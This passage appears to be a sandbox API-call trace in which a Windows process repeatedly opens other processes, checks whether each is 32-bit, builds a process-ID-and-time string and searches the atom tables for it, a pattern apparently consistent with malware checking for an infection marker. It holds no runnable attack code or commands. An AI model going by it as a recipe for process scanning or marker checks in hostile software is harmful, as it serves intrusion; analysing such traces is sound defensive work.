	[0108.225] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.225] CloseHandle (hObject=0x694) returned 1
	[0108.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0108.225] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.225] CloseHandle (hObject=0x694) returned 1
	[0108.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0108.225] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.225] CloseHandle (hObject=0x694) returned 1
	[0108.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0108.226] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.226] CloseHandle (hObject=0x694) returned 1
	[0108.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0108.226] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.226] CloseHandle (hObject=0x694) returned 1
	[0108.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0108.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0108.226] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.226] CloseHandle (hObject=0x694) returned 1
	[0108.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0108.226] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.226] CloseHandle (hObject=0x694) returned 1
	[0108.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0108.227] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.227] CloseHandle (hObject=0x694) returned 1
	[0108.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0108.227] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.227] CloseHandle (hObject=0x694) returned 1
	[0108.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0108.227] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.227] CloseHandle (hObject=0x694) returned 1
	[0108.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0108.227] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.227] CloseHandle (hObject=0x694) returned 1
	[0108.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0108.227] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.228] CloseHandle (hObject=0x694) returned 1
	[0108.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0108.228] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.228] CloseHandle (hObject=0x694) returned 1
	[0108.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0108.228] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.228] CloseHandle (hObject=0x694) returned 1
	[0108.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0108.228] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.228] CloseHandle (hObject=0x694) returned 1
	[0108.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0108.228] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.228] CloseHandle (hObject=0x694) returned 1
	[0108.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0108.229] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.229] CloseHandle (hObject=0x694) returned 1
	[0108.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0108.229] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.229] CloseHandle (hObject=0x694) returned 1
	[0108.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0108.229] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.229] CloseHandle (hObject=0x694) returned 1
	[0108.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0108.229] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.229] CloseHandle (hObject=0x694) returned 1
	[0108.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0108.230] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.230] CloseHandle (hObject=0x694) returned 1
	[0108.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0108.230] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.230] CloseHandle (hObject=0x694) returned 1
	[0108.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0108.230] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.230] CloseHandle (hObject=0x694) returned 1
	[0108.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0108.230] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.230] CloseHandle (hObject=0x694) returned 1
	[0108.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0108.231] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.231] CloseHandle (hObject=0x694) returned 1
	[0108.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0108.231] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.231] CloseHandle (hObject=0x694) returned 1
	[0108.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0108.231] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.231] CloseHandle (hObject=0x694) returned 1
	[0108.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0108.231] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.231] CloseHandle (hObject=0x694) returned 1
	[0108.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0108.232] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0108.232] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0108.232] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0108.232] wsprintfA (in: param_1=0x3993498, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0108.233] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0108.233] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0108.233] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0108.237] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0108.237] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0108.237] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0108.237] CloseHandle (hObject=0x694) returned 1
	[0108.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0108.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0108.237] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.237] CloseHandle (hObject=0x694) returned 1
	[0108.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0108.238] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.238] CloseHandle (hObject=0x694) returned 1
	[0108.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0108.238] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.238] CloseHandle (hObject=0x694) returned 1
	[0108.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0108.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0108.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0108.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0108.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0108.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0108.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0108.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0108.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0108.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0108.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0108.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0108.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0108.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0108.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0108.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0108.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0108.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0108.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0108.279] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.279] CloseHandle (hObject=0x694) returned 1
	[0108.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0108.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0108.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0108.280] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.280] CloseHandle (hObject=0x694) returned 1
	[0108.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0108.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0108.280] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.280] CloseHandle (hObject=0x694) returned 1
	[0108.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0108.280] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.280] CloseHandle (hObject=0x694) returned 1
	[0108.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0108.281] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.281] CloseHandle (hObject=0x694) returned 1
	[0108.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0108.281] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.281] CloseHandle (hObject=0x694) returned 1
	[0108.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0108.288] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.288] CloseHandle (hObject=0x694) returned 1
	[0108.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0108.288] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.288] CloseHandle (hObject=0x694) returned 1
	[0108.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0108.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0108.288] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.288] CloseHandle (hObject=0x694) returned 1
	[0108.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0108.288] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.288] CloseHandle (hObject=0x694) returned 1
	[0108.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0108.289] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.289] CloseHandle (hObject=0x694) returned 1
	[0108.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0108.289] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.289] CloseHandle (hObject=0x694) returned 1
	[0108.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0108.289] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.289] CloseHandle (hObject=0x694) returned 1
	[0108.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0108.289] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.289] CloseHandle (hObject=0x694) returned 1
	[0108.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0108.289] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.289] CloseHandle (hObject=0x694) returned 1
	[0108.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0108.290] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.290] CloseHandle (hObject=0x694) returned 1
	[0108.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0108.290] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.290] CloseHandle (hObject=0x694) returned 1
	[0108.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0108.290] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.290] CloseHandle (hObject=0x694) returned 1
	[0108.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0108.290] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.290] CloseHandle (hObject=0x694) returned 1
	[0108.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0108.291] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.291] CloseHandle (hObject=0x694) returned 1
	[0108.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0108.291] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.291] CloseHandle (hObject=0x694) returned 1
	[0108.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0108.291] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.291] CloseHandle (hObject=0x694) returned 1
	[0108.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0108.291] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.291] CloseHandle (hObject=0x694) returned 1
	[0108.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0108.291] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.291] CloseHandle (hObject=0x694) returned 1
	[0108.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0108.292] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.292] CloseHandle (hObject=0x694) returned 1
	[0108.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0108.292] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.292] CloseHandle (hObject=0x694) returned 1
	[0108.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0108.292] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.292] CloseHandle (hObject=0x694) returned 1
	[0108.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0108.292] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.292] CloseHandle (hObject=0x694) returned 1
	[0108.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0108.292] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.292] CloseHandle (hObject=0x694) returned 1
	[0108.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0108.293] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.293] CloseHandle (hObject=0x694) returned 1
	[0108.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0108.293] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.293] CloseHandle (hObject=0x694) returned 1
	[0108.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0108.293] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0108.294] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0108.294] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0108.294] wsprintfA (in: param_1=0x3993268, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0108.294] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0108.294] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0108.295] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0108.295] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0108.295] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0108.295] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0108.295] CloseHandle (hObject=0x694) returned 1
	[0108.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0108.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0108.295] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.295] CloseHandle (hObject=0x694) returned 1
	[0108.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0108.296] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.296] CloseHandle (hObject=0x694) returned 1
	[0108.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0108.296] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.296] CloseHandle (hObject=0x694) returned 1
	[0108.405] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0108.405] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0108.405] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0108.405] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0108.406] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0108.406] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0108.406] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0108.406] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0108.407] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0108.407] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0108.407] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0108.407] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0108.407] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0108.407] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0108.407] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0108.408] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0108.408] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0108.408] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0108.408] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0108.408] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.408] CloseHandle (hObject=0x694) returned 1
	[0108.408] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0108.408] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0108.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0108.409] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.409] CloseHandle (hObject=0x694) returned 1
	[0108.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0108.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0108.409] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.409] CloseHandle (hObject=0x694) returned 1
	[0108.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0108.410] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.410] CloseHandle (hObject=0x694) returned 1
	[0108.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0108.410] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.410] CloseHandle (hObject=0x694) returned 1
	[0108.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0108.410] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.410] CloseHandle (hObject=0x694) returned 1
	[0108.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0108.410] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.410] CloseHandle (hObject=0x694) returned 1
	[0108.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0108.411] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.411] CloseHandle (hObject=0x694) returned 1
	[0108.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0108.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0108.411] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.411] CloseHandle (hObject=0x694) returned 1
	[0108.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0108.411] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.411] CloseHandle (hObject=0x694) returned 1
	[0108.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
